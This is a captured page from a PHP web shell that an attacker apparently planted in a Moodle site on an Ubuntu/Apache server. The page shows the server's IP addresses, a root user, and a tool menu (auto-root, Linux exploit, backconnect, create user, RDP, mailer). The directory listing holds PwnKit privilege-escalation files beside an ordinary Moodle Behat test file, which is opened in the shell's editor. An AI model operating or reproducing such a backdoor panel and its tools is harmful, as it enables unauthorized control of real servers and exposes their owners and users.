Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
report /
configlog /
tests /
behat /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
view_report.feature
2.2
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : view_report.feature
@report @report_configlog Feature: In a report, admin can see configuration changes In order see configuration changes As an admin I need to view the configuration changes report and use search to filter the report # Set some config values so the report contains known data. Background: Given I log in as "admin" And I change the window size to "large" And I set the following administration settings values: | Initial number of overall feedback fields | 5 | | Maximum folder download size | 2048 | | Default city | Perth | @javascript Scenario: Display configuration changes report When I navigate to "Reports > Config changes" in site administration Then the following should exist in the "report-configlog-report-table" table: | User | Plugin | Setting | New value | Original value | | Admin User | quiz | initialnumfeedbacks | 5 | 2 | | Admin User | folder | maxsizetodownload | 2048 | 0 | | Admin User | core | defaultcity | Perth | | @javascript Scenario Outline: Search configuration changes report When I navigate to "Reports > Config changes" in site administration And I click on "Show more..." "link" And I set the field "<field>" to "<search>" And I click on "Search" "button" in the "#fitem_id_submitbutton" "css_element" Then the following should exist in the "report-configlog-report-table" table: | Plugin | Setting | New value | | <plugin> | <setting> | <value> | And I should not see "<excluded>" in the "report-configlog-report-table" "table" Examples: | field | search | plugin | setting | value | excluded | | Setting | initialnumfeedbacks | quiz | initialnumfeedbacks | 5 | maxsizetodownload | | Setting | maxsizetodownload | folder | maxsizetodownload | 2048 | initialnumfeedbacks | | Value | Perth | core | defaultcity | Perth | maxsizetodownload | | User | Admin | core | defaultcity | Perth | zzzzzzzzz |
Close